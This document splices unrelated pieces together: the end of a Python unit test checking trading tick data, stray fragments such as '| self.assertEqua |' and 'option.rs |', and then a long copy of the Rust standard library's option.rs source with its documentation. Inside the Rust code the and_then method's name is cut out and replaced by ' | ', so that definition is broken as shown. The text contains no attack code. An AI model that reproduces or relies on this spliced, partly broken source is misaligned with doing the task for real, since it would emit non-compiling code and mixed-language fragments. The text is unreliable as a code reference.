self.assertEqual(ticks.open_interest.iloc[-1], 6940)
self.assertEqual(ticks["open_interest"].iloc[-2], 6940)
self.assertEqual(ticks.iloc[-1]["ask_price1"], 47650)
        # error cases
self.assertRaises(Exception, api.get_tick_serial, "SHFE.au1999")
self.assertRaises(AttributeError, ticks.iloc[-1].__getattribute__, "dur")
self.assertRaises(KeyError, ticks.iloc[-1].__getitem__, "dur")
api.close()
| self.assertEqua |
option.rs | // Copyright 2012-2014 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Optional values.
//!
//! Type [`Option`] represents an optional value: every [`Option`]
//! is either [`Some`] and contains a value, or [`None`], and
//! does not. [`Option`] types are very common in Rust code, as
//! they have a number of uses:
//!
//! * Initial values
//! * Return values for functions that are not defined
//! over their entire input range (partial functions)
//! * Return value for otherwise reporting simple errors, where `None` is
//! returned on error
//! * Optional struct fields
//! * Struct fields that can be loaned or "taken"
//! * Optional function arguments
//! * Nullable pointers
//! * Swapping things out of difficult situations
//!
//! [`Option`]s are commonly paired with pattern matching to query the presence
//! of a value and take action, always accounting for the [`None`] case.
//!
//! ```
//! fn divide(numerator: f64, denominator: f64) -> Option<f64> {
//! if denominator == 0.0 {
//! None
//! } else {
//! Some(numerator / denominator)
//! }
//! }
//!
//! // The return value of the function is an option
//! let result = divide(2.0, 3.0);
//!
//! // Pattern match to retrieve the value
//! match result {
//! // The division was valid
//! Some(x) => println!("Result: {}", x),
//! // The division was invalid
//! None => println!("Cannot divide by 0"),
//! }
//! ```
//!
//
// FIXME: Show how `Option` is used in practice, with lots of methods
//
//! # Options and pointers ("nullable" pointers)
//!
//! Rust's pointer types must always point to a valid location; there are
//! no "null" pointers. Instead, Rust has *optional* pointers, like
//! the optional owned box, [`Option`]`<`[`Box<T>`]`>`.
//!
//! The following example uses [`Option`] to create an optional box of
//! [`i32`]. Notice that in order to use the inner [`i32`] value first, the
//! `check_optional` function needs to use pattern matching to
//! determine whether the box has a value (i.e. it is [`Some(...)`][`Some`]) or
//! not ([`None`]).
//!
//! ```
//! let optional = None;
//! check_optional(optional);
//!
//! let optional = Some(Box::new(9000));
//! check_optional(optional);
//!
//! fn check_optional(optional: Option<Box<i32>>) {
//! match optional {
//! Some(ref p) => println!("has value {}", p),
//! None => println!("has no value"),
//! }
//! }
//! ```
//!
//! This usage of [`Option`] to create safe nullable pointers is so
//! common that Rust does special optimizations to make the
//! representation of [`Option`]`<`[`Box<T>`]`>` a single pointer. Optional pointers
//! in Rust are stored as efficiently as any other pointer type.
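//!
//! ```
//! // Illustrative check (added, not part of the original docs): the niche
//! // optimization makes Option<Box<i32>> exactly pointer-sized.
//! use std::mem::size_of;
//! assert_eq!(size_of::<Option<Box<i32>>>(), size_of::<Box<i32>>());
//! ```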
//!
//! # Examples
//!
//! Basic pattern matching on [`Option`]:
//!
//! ```
//! let msg = Some("howdy");
//!
//! // Take a reference to the contained string
//! if let Some(ref m) = msg {
//! println!("{}", *m);
//! }
//!
//! // Remove the contained string, destroying the Option
//! let unwrapped_msg = msg.unwrap_or("default message");
//! ```
//!
//! Initialize a result to [`None`] before a loop:
//!
//! ```
//! enum Kingdom { Plant(u32, &'static str), Animal(u32, &'static str) }
//!
//! // A list of data to search through.
//! let all_the_big_things = [
//! Kingdom::Plant(250, "redwood"),
//! Kingdom::Plant(230, "noble fir"),
//! Kingdom::Plant(229, "sugar pine"),
//! Kingdom::Animal(25, "blue whale"),
//! Kingdom::Animal(19, "fin whale"),
//! Kingdom::Animal(15, "north pacific right whale"),
//! ];
//!
//! // We're going to search for the name of the biggest animal,
//! // but to start with we've just got `None`.
//! let mut name_of_biggest_animal = None;
//! let mut size_of_biggest_animal = 0;
//! for big_thing in &all_the_big_things {
//! match *big_thing {
//! Kingdom::Animal(size, name) if size > size_of_biggest_animal => {
//! // Now we've found the name of some big animal
//! size_of_biggest_animal = size;
//! name_of_biggest_animal = Some(name);
//! }
//! Kingdom::Animal(..) | Kingdom::Plant(..) => ()
//! }
//! }
//!
//! match name_of_biggest_animal {
//! Some(name) => println!("the biggest animal is {}", name),
//! None => println!("there are no animals :("),
//! }
//! ```
//!
//! [`Option`]: enum.Option.html
//! [`Some`]: enum.Option.html#variant.Some
//! [`None`]: enum.Option.html#variant.None
//! [`Box<T>`]: ../../std/boxed/struct.Box.html
//! [`i32`]: ../../std/primitive.i32.html
#![stable(feature = "rust1", since = "1.0.0")]
use iter::{FromIterator, FusedIterator, TrustedLen};
use {hint, mem, ops::{self, Deref}};
use mem::PinMut;
// Note that this is not a lang item per se, but it has a hidden dependency on
// `Iterator`, which is one. The compiler assumes that the `next` method of
// `Iterator` is an enumeration with one type parameter and two variants,
// which basically means it must be `Option`.
/// The `Option` type. See [the module level documentation](index.html) for more.
#[derive(Clone, Copy, PartialEq, PartialOrd, Eq, Ord, Debug, Hash)]
#[stable(feature = "rust1", since = "1.0.0")]
pub enum Option<T> {
/// No value
#[stable(feature = "rust1", since = "1.0.0")]
None,
/// Some value `T`
#[stable(feature = "rust1", since = "1.0.0")]
Some(#[stable(feature = "rust1", since = "1.0.0")] T),
}
/////////////////////////////////////////////////////////////////////////////
// Type implementation
/////////////////////////////////////////////////////////////////////////////
impl<T> Option<T> {
/////////////////////////////////////////////////////////////////////////
// Querying the contained values
/////////////////////////////////////////////////////////////////////////
/// Returns `true` if the option is a [`Some`] value.
///
/// # Examples
///
/// ```
/// let x: Option<u32> = Some(2);
/// assert_eq!(x.is_some(), true);
///
/// let x: Option<u32> = None;
/// assert_eq!(x.is_some(), false);
/// ```
///
/// [`Some`]: #variant.Some
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_some(&self) -> bool {
match *self {
Some(_) => true,
None => false,
}
}
/// Returns `true` if the option is a [`None`] value.
///
/// # Examples
///
/// ```
/// let x: Option<u32> = Some(2);
/// assert_eq!(x.is_none(), false);
///
/// let x: Option<u32> = None;
/// assert_eq!(x.is_none(), true);
/// ```
///
/// [`None`]: #variant.None
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn is_none(&self) -> bool {
!self.is_some()
}
/////////////////////////////////////////////////////////////////////////
// Adapter for working with references
/////////////////////////////////////////////////////////////////////////
/// Converts from `Option<T>` to `Option<&T>`.
///
/// # Examples
///
/// Convert an `Option<`[`String`]`>` into an `Option<`[`usize`]`>`, preserving the original.
/// The [`map`] method takes the `self` argument by value, consuming the original,
/// so this technique uses `as_ref` to first take an `Option` to a reference
/// to the value inside the original.
///
/// [`map`]: enum.Option.html#method.map
/// [`String`]: ../../std/string/struct.String.html
/// [`usize`]: ../../std/primitive.usize.html
///
/// ```
/// let text: Option<String> = Some("Hello, world!".to_string());
/// // First, cast `Option<String>` to `Option<&String>` with `as_ref`,
/// // then consume *that* with `map`, leaving `text` on the stack.
/// let text_length: Option<usize> = text.as_ref().map(|s| s.len());
/// println!("still can print text: {:?}", text);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn as_ref(&self) -> Option<&T> {
match *self {
Some(ref x) => Some(x),
None => None,
}
}
/// Converts from `Option<T>` to `Option<&mut T>`.
///
/// # Examples
///
/// ```
/// let mut x = Some(2);
/// match x.as_mut() {
/// Some(v) => *v = 42,
/// None => {},
/// }
/// assert_eq!(x, Some(42));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn as_mut(&mut self) -> Option<&mut T> {
match *self {
Some(ref mut x) => Some(x),
None => None,
}
}
/// Converts from `Option<T>` to `Option<PinMut<'_, T>>`
#[inline]
#[unstable(feature = "pin", issue = "49150")]
pub fn as_pin_mut<'a>(self: PinMut<'a, Self>) -> Option<PinMut<'a, T>> {
unsafe {
PinMut::get_mut_unchecked(self).as_mut().map(|x| PinMut::new_unchecked(x))
}
}
/////////////////////////////////////////////////////////////////////////
// Getting to contained values
/////////////////////////////////////////////////////////////////////////
/// Unwraps an option, yielding the content of a [`Some`].
///
/// # Panics
///
/// Panics if the value is a [`None`] with a custom panic message provided by
/// `msg`.
///
/// [`Some`]: #variant.Some
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let x = Some("value");
/// assert_eq!(x.expect("the world is ending"), "value");
/// ```
///
/// ```{.should_panic}
/// let x: Option<&str> = None;
/// x.expect("the world is ending"); // panics with `the world is ending`
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn expect(self, msg: &str) -> T {
match self {
Some(val) => val,
None => expect_failed(msg),
}
}
/// Moves the value `v` out of the `Option<T>` if it is [`Some(v)`].
///
/// In general, because this function may panic, its use is discouraged.
/// Instead, prefer to use pattern matching and handle the [`None`]
/// case explicitly.
///
/// # Panics
///
/// Panics if the self value equals [`None`].
///
/// [`Some(v)`]: #variant.Some
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let x = Some("air");
/// assert_eq!(x.unwrap(), "air");
/// ```
///
/// ```{.should_panic}
/// let x: Option<&str> = None;
/// assert_eq!(x.unwrap(), "air"); // fails
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap(self) -> T {
match self {
Some(val) => val,
None => panic!("called `Option::unwrap()` on a `None` value"),
}
}
/// Returns the contained value or a default.
///
/// Arguments passed to `unwrap_or` are eagerly evaluated; if you are passing
/// the result of a function call, it is recommended to use [`unwrap_or_else`],
/// which is lazily evaluated.
///
/// [`unwrap_or_else`]: #method.unwrap_or_else
///
/// # Examples
///
/// ```
/// assert_eq!(Some("car").unwrap_or("bike"), "car");
/// assert_eq!(None.unwrap_or("bike"), "bike");
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap_or(self, def: T) -> T {
match self {
Some(x) => x,
None => def,
}
}
/// Returns the contained value or computes it from a closure.
///
/// # Examples
///
/// ```
/// let k = 10;
/// assert_eq!(Some(4).unwrap_or_else(|| 2 * k), 4);
/// assert_eq!(None.unwrap_or_else(|| 2 * k), 20);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap_or_else<F: FnOnce() -> T>(self, f: F) -> T {
match self {
Some(x) => x,
None => f(),
}
}
/////////////////////////////////////////////////////////////////////////
// Transforming contained values
/////////////////////////////////////////////////////////////////////////
/// Maps an `Option<T>` to `Option<U>` by applying a function to a contained value.
///
/// # Examples
///
/// Convert an `Option<`[`String`]`>` into an `Option<`[`usize`]`>`, consuming the original:
///
/// [`String`]: ../../std/string/struct.String.html
/// [`usize`]: ../../std/primitive.usize.html
///
/// ```
/// let maybe_some_string = Some(String::from("Hello, World!"));
/// // `Option::map` takes self *by value*, consuming `maybe_some_string`
/// let maybe_some_len = maybe_some_string.map(|s| s.len());
///
/// assert_eq!(maybe_some_len, Some(13));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn map<U, F: FnOnce(T) -> U>(self, f: F) -> Option<U> {
match self {
Some(x) => Some(f(x)),
None => None,
}
}
/// Applies a function to the contained value (if any),
/// or returns the provided default (if not).
///
/// # Examples
///
/// ```
/// let x = Some("foo");
/// assert_eq!(x.map_or(42, |v| v.len()), 3);
///
/// let x: Option<&str> = None;
/// assert_eq!(x.map_or(42, |v| v.len()), 42);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn map_or<U, F: FnOnce(T) -> U>(self, default: U, f: F) -> U {
match self {
Some(t) => f(t),
None => default,
}
}
/// Applies a function to the contained value (if any),
/// or computes a default (if not).
///
/// # Examples
///
/// ```
/// let k = 21;
///
/// let x = Some("foo");
/// assert_eq!(x.map_or_else(|| 2 * k, |v| v.len()), 3);
///
/// let x: Option<&str> = None;
/// assert_eq!(x.map_or_else(|| 2 * k, |v| v.len()), 42);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn map_or_else<U, D: FnOnce() -> U, F: FnOnce(T) -> U>(self, default: D, f: F) -> U {
match self {
Some(t) => f(t),
None => default(),
}
}
/// Transforms the `Option<T>` into a [`Result<T, E>`], mapping [`Some(v)`] to
/// [`Ok(v)`] and [`None`] to [`Err(err)`].
///
/// Arguments passed to `ok_or` are eagerly evaluated; if you are passing the
/// result of a function call, it is recommended to use [`ok_or_else`], which is
/// lazily evaluated.
///
/// [`Result<T, E>`]: ../../std/result/enum.Result.html
/// [`Ok(v)`]: ../../std/result/enum.Result.html#variant.Ok
/// [`Err(err)`]: ../../std/result/enum.Result.html#variant.Err
/// [`None`]: #variant.None
/// [`Some(v)`]: #variant.Some
/// [`ok_or_else`]: #method.ok_or_else
///
/// # Examples
///
/// ```
/// let x = Some("foo");
/// assert_eq!(x.ok_or(0), Ok("foo"));
///
/// let x: Option<&str> = None;
/// assert_eq!(x.ok_or(0), Err(0));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn ok_or<E>(self, err: E) -> Result<T, E> {
match self {
Some(v) => Ok(v),
None => Err(err),
}
}
/// Transforms the `Option<T>` into a [`Result<T, E>`], mapping [`Some(v)`] to
/// [`Ok(v)`] and [`None`] to [`Err(err())`].
///
/// [`Result<T, E>`]: ../../std/result/enum.Result.html
/// [`Ok(v)`]: ../../std/result/enum.Result.html#variant.Ok
/// [`Err(err())`]: ../../std/result/enum.Result.html#variant.Err
/// [`None`]: #variant.None
/// [`Some(v)`]: #variant.Some
///
/// # Examples
///
/// ```
/// let x = Some("foo");
/// assert_eq!(x.ok_or_else(|| 0), Ok("foo"));
///
/// let x: Option<&str> = None;
/// assert_eq!(x.ok_or_else(|| 0), Err(0));
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn ok_or_else<E, F: FnOnce() -> E>(self, err: F) -> Result<T, E> {
match self {
Some(v) => Ok(v),
None => Err(err()),
}
}
/////////////////////////////////////////////////////////////////////////
// Iterator constructors
/////////////////////////////////////////////////////////////////////////
/// Returns an iterator over the possibly contained value.
///
/// # Examples
///
/// ```
/// let x = Some(4);
/// assert_eq!(x.iter().next(), Some(&4));
///
/// let x: Option<u32> = None;
/// assert_eq!(x.iter().next(), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn iter(&self) -> Iter<T> {
Iter { inner: Item { opt: self.as_ref() } }
}
/// Returns a mutable iterator over the possibly contained value.
///
/// # Examples
///
/// ```
/// let mut x = Some(4);
/// match x.iter_mut().next() {
/// Some(v) => *v = 42,
/// None => {},
/// }
/// assert_eq!(x, Some(42));
///
/// let mut x: Option<u32> = None;
/// assert_eq!(x.iter_mut().next(), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn iter_mut(&mut self) -> IterMut<T> {
IterMut { inner: Item { opt: self.as_mut() } }
}
/////////////////////////////////////////////////////////////////////////
// Boolean operations on the values, eager and lazy
/////////////////////////////////////////////////////////////////////////
/// Returns [`None`] if the option is [`None`], otherwise returns `optb`.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let x = Some(2);
/// let y: Option<&str> = None;
/// assert_eq!(x.and(y), None);
///
/// let x: Option<u32> = None;
/// let y = Some("foo");
/// assert_eq!(x.and(y), None);
///
/// let x = Some(2);
/// let y = Some("foo");
/// assert_eq!(x.and(y), Some("foo"));
///
/// let x: Option<u32> = None;
/// let y: Option<&str> = None;
/// assert_eq!(x.and(y), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn and<U>(self, optb: Option<U>) -> Option<U> {
match self {
Some(_) => optb,
None => None,
}
}
/// Returns [`None`] if the option is [`None`], otherwise calls `f` with the
/// wrapped value and returns the result.
///
/// Some languages call this operation flatmap.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// fn sq(x: u32) -> Option<u32> { Some(x * x) }
/// fn nope(_: u32) -> Option<u32> { None }
///
/// assert_eq!(Some(2).and_then(sq).and_then(sq), Some(16));
/// assert_eq!(Some(2).and_then(sq).and_then(nope), None);
/// assert_eq!(Some(2).and_then(nope).and_then(sq), None);
/// assert_eq!(None.and_then(sq).and_then(sq), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn | <U, F: FnOnce(T) -> Option<U>>(self, f: F) -> Option<U> {
match self {
Some(x) => f(x),
None => None,
}
}
/// Returns `None` if the option is `None`, otherwise calls `predicate`
/// with the wrapped value and returns:
///
/// - `Some(t)` if `predicate` returns `true` (where `t` is the wrapped
/// value), and
/// - `None` if `predicate` returns `false`.
///
    /// This function works similarly to `Iterator::filter()`. You can imagine
/// the `Option<T>` being an iterator over one or zero elements. `filter()`
/// lets you decide which elements to keep.
///
/// # Examples
///
/// ```rust
/// fn is_even(n: &i32) -> bool {
/// n % 2 == 0
/// }
///
/// assert_eq!(None.filter(is_even), None);
/// assert_eq!(Some(3).filter(is_even), None);
/// assert_eq!(Some(4).filter(is_even), Some(4));
/// ```
#[inline]
#[stable(feature = "option_filter", since = "1.27.0")]
pub fn filter<P: FnOnce(&T) -> bool>(self, predicate: P) -> Self {
if let Some(x) = self {
if predicate(&x) {
return Some(x)
}
}
None
}
/// Returns the option if it contains a value, otherwise returns `optb`.
///
/// Arguments passed to `or` are eagerly evaluated; if you are passing the
/// result of a function call, it is recommended to use [`or_else`], which is
/// lazily evaluated.
///
/// [`or_else`]: #method.or_else
///
/// # Examples
///
/// ```
/// let x = Some(2);
/// let y = None;
/// assert_eq!(x.or(y), Some(2));
///
/// let x = None;
/// let y = Some(100);
/// assert_eq!(x.or(y), Some(100));
///
/// let x = Some(2);
/// let y = Some(100);
/// assert_eq!(x.or(y), Some(2));
///
/// let x: Option<u32> = None;
/// let y = None;
/// assert_eq!(x.or(y), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn or(self, optb: Option<T>) -> Option<T> {
match self {
Some(_) => self,
None => optb,
}
}
/// Returns the option if it contains a value, otherwise calls `f` and
/// returns the result.
///
/// # Examples
///
/// ```
/// fn nobody() -> Option<&'static str> { None }
/// fn vikings() -> Option<&'static str> { Some("vikings") }
///
/// assert_eq!(Some("barbarians").or_else(vikings), Some("barbarians"));
/// assert_eq!(None.or_else(vikings), Some("vikings"));
/// assert_eq!(None.or_else(nobody), None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn or_else<F: FnOnce() -> Option<T>>(self, f: F) -> Option<T> {
match self {
Some(_) => self,
None => f(),
}
}
/// Returns [`Some`] if exactly one of `self`, `optb` is [`Some`], otherwise returns `None`.
///
/// [`Some`]: #variant.Some
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// #![feature(option_xor)]
///
/// let x = Some(2);
/// let y: Option<u32> = None;
/// assert_eq!(x.xor(y), Some(2));
///
/// let x: Option<u32> = None;
/// let y = Some(2);
/// assert_eq!(x.xor(y), Some(2));
///
/// let x = Some(2);
/// let y = Some(2);
/// assert_eq!(x.xor(y), None);
///
/// let x: Option<u32> = None;
/// let y: Option<u32> = None;
/// assert_eq!(x.xor(y), None);
/// ```
#[inline]
#[unstable(feature = "option_xor", issue = "50512")]
pub fn xor(self, optb: Option<T>) -> Option<T> {
match (self, optb) {
(Some(a), None) => Some(a),
(None, Some(b)) => Some(b),
_ => None,
}
}
/////////////////////////////////////////////////////////////////////////
// Entry-like operations to insert if None and return a reference
/////////////////////////////////////////////////////////////////////////
/// Inserts `v` into the option if it is [`None`], then
/// returns a mutable reference to the contained value.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let mut x = None;
///
/// {
/// let y: &mut u32 = x.get_or_insert(5);
/// assert_eq!(y, &5);
///
/// *y = 7;
/// }
///
/// assert_eq!(x, Some(7));
/// ```
#[inline]
#[stable(feature = "option_entry", since = "1.20.0")]
pub fn get_or_insert(&mut self, v: T) -> &mut T {
match *self {
None => *self = Some(v),
_ => (),
}
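        // SAFETY: the match above replaced a `None` with `Some(v)`, so `self`
        // is guaranteed to be `Some` here and the `None` arm is unreachable.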
match *self {
Some(ref mut v) => v,
None => unsafe { hint::unreachable_unchecked() },
}
}
/// Inserts a value computed from `f` into the option if it is [`None`], then
/// returns a mutable reference to the contained value.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let mut x = None;
///
/// {
/// let y: &mut u32 = x.get_or_insert_with(|| 5);
/// assert_eq!(y, &5);
///
/// *y = 7;
/// }
///
/// assert_eq!(x, Some(7));
/// ```
#[inline]
#[stable(feature = "option_entry", since = "1.20.0")]
pub fn get_or_insert_with<F: FnOnce() -> T>(&mut self, f: F) -> &mut T {
match *self {
None => *self = Some(f()),
_ => (),
}
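        // SAFETY: the match above replaced a `None` with `Some(f())`, so the
        // `None` arm below is unreachable.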
match *self {
Some(ref mut v) => v,
None => unsafe { hint::unreachable_unchecked() },
}
}
/////////////////////////////////////////////////////////////////////////
// Misc
/////////////////////////////////////////////////////////////////////////
/// Takes the value out of the option, leaving a [`None`] in its place.
///
/// [`None`]: #variant.None
///
/// # Examples
///
/// ```
/// let mut x = Some(2);
/// let y = x.take();
/// assert_eq!(x, None);
/// assert_eq!(y, Some(2));
///
/// let mut x: Option<u32> = None;
/// let y = x.take();
/// assert_eq!(x, None);
/// assert_eq!(y, None);
/// ```
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn take(&mut self) -> Option<T> {
mem::replace(self, None)
}
    /// Replaces the actual value in the option with the given value,
/// returning the old value if present,
/// leaving a [`Some`] in its place without deinitializing either one.
///
/// [`Some`]: #variant.Some
///
/// # Examples
///
/// ```
/// #![feature(option_replace)]
///
/// let mut x = Some(2);
/// let old = x.replace(5);
/// assert_eq!(x, Some(5));
/// assert_eq!(old, Some(2));
///
/// let mut x = None;
/// let old = x.replace(3);
/// assert_eq!(x, Some(3));
/// assert_eq!(old, None);
/// ```
#[inline]
#[unstable(feature = "option_replace", issue = "51998")]
pub fn replace(&mut self, value: T) -> Option<T> {
mem::replace(self, Some(value))
}
}
impl<'a, T: Clone> Option<&'a T> {
/// Maps an `Option<&T>` to an `Option<T>` by cloning the contents of the
/// option.
///
/// # Examples
///
/// ```
/// let x = 12;
/// let opt_x = Some(&x);
/// assert_eq!(opt_x, Some(&12));
/// let cloned = opt_x.cloned();
/// assert_eq!(cloned, Some(12));
/// ```
#[stable(feature = "rust1", since = "1.0.0")]
pub fn cloned(self) -> Option<T> {
self.map(|t| t.clone())
}
}
impl<'a, T: Clone> Option<&'a mut T> {
/// Maps an `Option<&mut T>` to an `Option<T>` by cloning the contents of the
/// option.
///
/// # Examples
///
/// ```
/// let mut x = 12;
/// let opt_x = Some(&mut x);
/// assert_eq!(opt_x, Some(&mut 12));
/// let cloned = opt_x.cloned();
/// assert_eq!(cloned, Some(12));
/// ```
#[stable(since = "1.26.0", feature = "option_ref_mut_cloned")]
pub fn cloned(self) -> Option<T> {
self.map(|t| t.clone())
}
}
impl<T: Default> Option<T> {
/// Returns the contained value or a default
///
/// Consumes the `self` argument then, if [`Some`], returns the contained
/// value, otherwise if [`None`], returns the [default value] for that
/// type.
///
/// # Examples
///
/// Convert a string to an integer, turning poorly-formed strings
/// into 0 (the default value for integers). [`parse`] converts
/// a string to any other type that implements [`FromStr`], returning
/// [`None`] on error.
///
/// ```
/// let good_year_from_input = "1909";
/// let bad_year_from_input = "190blarg";
/// let good_year = good_year_from_input.parse().ok().unwrap_or_default();
/// let bad_year = bad_year_from_input.parse().ok().unwrap_or_default();
///
/// assert_eq!(1909, good_year);
/// assert_eq!(0, bad_year);
/// ```
///
/// [`Some`]: #variant.Some
/// [`None`]: #variant.None
/// [default value]: ../default/trait.Default.html#tymethod.default
/// [`parse`]: ../../std/primitive.str.html#method.parse
/// [`FromStr`]: ../../std/str/trait.FromStr.html
#[inline]
#[stable(feature = "rust1", since = "1.0.0")]
pub fn unwrap_or_default(self) -> T {
match self {
Some(x) => x,
None => Default::default(),
}
}
}
#[unstable(feature = "inner_deref", reason = "newly added", issue = "50264")]
impl<T: Deref> Option<T> {
/// Converts from `&Option<T>` to `Option<&T::Target>`.
///
/// Leaves the original Option in-place, creating a new one with a reference
/// to the original one, additionally coercing the contents via `Deref`.
pub fn deref(&self) -> Option<&T::Target> {
self.as_ref().map(|t| t.deref())
}
}
impl<T, E> Option<Result<T, E>> {
/// Transposes an `Option` of a `Result` into a `Result` of an `Option`.
///
/// `None` will be mapped to `Ok(None)`.
/// `Some(Ok(_))` and `Some(Err(_))` will be mapped to `Ok(Some(_))` and `Err(_)`.
///
/// # Examples
///
/// ```
/// #![feature(transpose_result)]
///
/// #[derive(Debug, Eq, PartialEq)]
/// struct SomeErr;
///
/// let x: Result<Option<i32>, SomeErr> = Ok(Some(5));
/// let y: Option<Result<i32, SomeErr>> = Some(Ok(5));
/// assert_eq!(x, y.transpose());
/// ```
#[inline]
#[unstable(feature = "transpose_result", issue = "47338")]
pub fn transpose(self) -> Result<Option<T>, E> {
match self {
Some(Ok(x)) => Ok(Some(x)),
Some(Err(e)) => Err(e),
None => Ok(None),
}
}
}
// This is a separate function to reduce the code size of .expect() itself.
#[inline(never)]
#[cold]
fn expect_failed(msg: &str) -> ! {
panic!("{}", msg)
}
/////////////////////////////////////////////////////////////////////////////
// Trait implementations
/////////////////////////////////////////////////////////////////////////////
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> Default for Option<T> {
/// Returns [`None`].
///
/// [`None`]: #variant.None
#[inline]
fn default() -> Option<T> { None }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<T> IntoIterator for Option<T> {
type Item = T;
type IntoIter = IntoIter<T>;
/// Returns a consuming iterator over the possibly contained value.
///
/// # Examples
///
/// ```
/// let x = Some("string");
/// let v: Vec<&str> = x.into_iter().collect();
/// assert_eq!(v, ["string"]);
///
/// let x = None;
/// let v: Vec<&str> = x.into_iter().collect();
/// assert!(v.is_empty());
/// ```
#[inline]
fn into_iter(self) -> IntoIter<T> {
IntoIter { inner: Item { opt: self } }
}
}
#[stable(since = "1.4.0", feature = "option_iter")]
impl<'a, T> IntoIterator for &'a Option<T> {
type Item = &'a T;
type IntoIter = Iter<'a, T>;
fn into_iter(self) -> Iter<'a, T> {
self.iter()
}
}
#[stable(since = "1.4.0", feature = "option_iter")]
impl<'a, T> IntoIterator for &'a mut Option<T> {
type Item = &'a mut T;
type IntoIter = IterMut<'a, T>;
fn into_iter(self) -> IterMut<'a, T> {
self.iter_mut()
}
}
#[stable(since = "1.12.0", feature = "option_from")]
impl<T> From<T> for Option<T> {
fn from(val: T) -> Option<T> {
Some(val)
}
}
/////////////////////////////////////////////////////////////////////////////
// The Option Iterators
/////////////////////////////////////////////////////////////////////////////
#[derive(Clone, Debug)]
struct Item<A> {
opt: Option<A>
}
impl<A> Iterator for Item<A> {
type Item = A;
#[inline]
fn next(&mut self) -> Option<A> {
self.opt.take()
}
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) {
match self.opt {
Some(_) => (1, Some(1)),
None => (0, Some(0)),
}
}
}
impl<A> DoubleEndedIterator for Item<A> {
#[inline]
fn next_back(&mut self) -> Option<A> {
self.opt.take()
}
}
impl<A> ExactSizeIterator for Item<A> {}
impl<A> FusedIterator for Item<A> {}
unsafe impl<A> TrustedLen for Item<A> {}
/// An iterator over a reference to the [`Some`] variant of an [`Option`].
///
/// The iterator yields one value if the [`Option`] is a [`Some`], otherwise none.
///
/// This `struct` is created by the [`Option::iter`] function.
///
/// [`Option`]: enum.Option.html
/// [`Some`]: enum.Option.html#variant.Some
/// [`Option::iter`]: enum.Option.html#method.iter
#[stable(feature = "rust1", since = "1.0.0")]
#[derive(Debug)]
pub struct Iter<'a, A: 'a> { inner: Item<&'a A> }
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> Iterator for Iter<'a, A> {
type Item = &'a A;
#[inline]
fn next(&mut self) -> Option<&'a A> { self.inner.next() }
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) { self.inner.size_hint() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> DoubleEndedIterator for Iter<'a, A> {
#[inline]
fn next_back(&mut self) -> Option<&'a A> { self.inner.next_back() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> ExactSizeIterator for Iter<'a, A> {}
#[stable(feature = "fused", since = "1.26.0")]
impl<'a, A> FusedIterator for Iter<'a, A> {}
#[unstable(feature = "trusted_len", issue = "37572")]
unsafe impl<'a, A> TrustedLen for Iter<'a, A> {}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> Clone for Iter<'a, A> {
#[inline]
fn clone(&self) -> Iter<'a, A> {
Iter { inner: self.inner.clone() }
}
}
/// An iterator over a mutable reference to the [`Some`] variant of an [`Option`].
///
/// The iterator yields one value if the [`Option`] is a [`Some`], otherwise none.
///
/// This `struct` is created by the [`Option::iter_mut`] function.
///
/// [`Option`]: enum.Option.html
/// [`Some`]: enum.Option.html#variant.Some
/// [`Option::iter_mut`]: enum.Option.html#method.iter_mut
#[stable(feature = "rust1", since = "1.0.0")]
#[derive(Debug)]
pub struct IterMut<'a, A: 'a> { inner: Item<&'a mut A> }
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> Iterator for IterMut<'a, A> {
type Item = &'a mut A;
#[inline]
fn next(&mut self) -> Option<&'a mut A> { self.inner.next() }
#[inline]
fn size_hint(&self) -> (usize, Option<usize>) { self.inner.size_hint() }
}
#[stable(feature = "rust1", since = "1.0.0")]
impl<'a, A> DoubleEndedIterator for IterMut<'a, A> {
#[inline]
fn next_back(&mut self) -> Option<&'a mut A> { self.inner.next_back() }
}
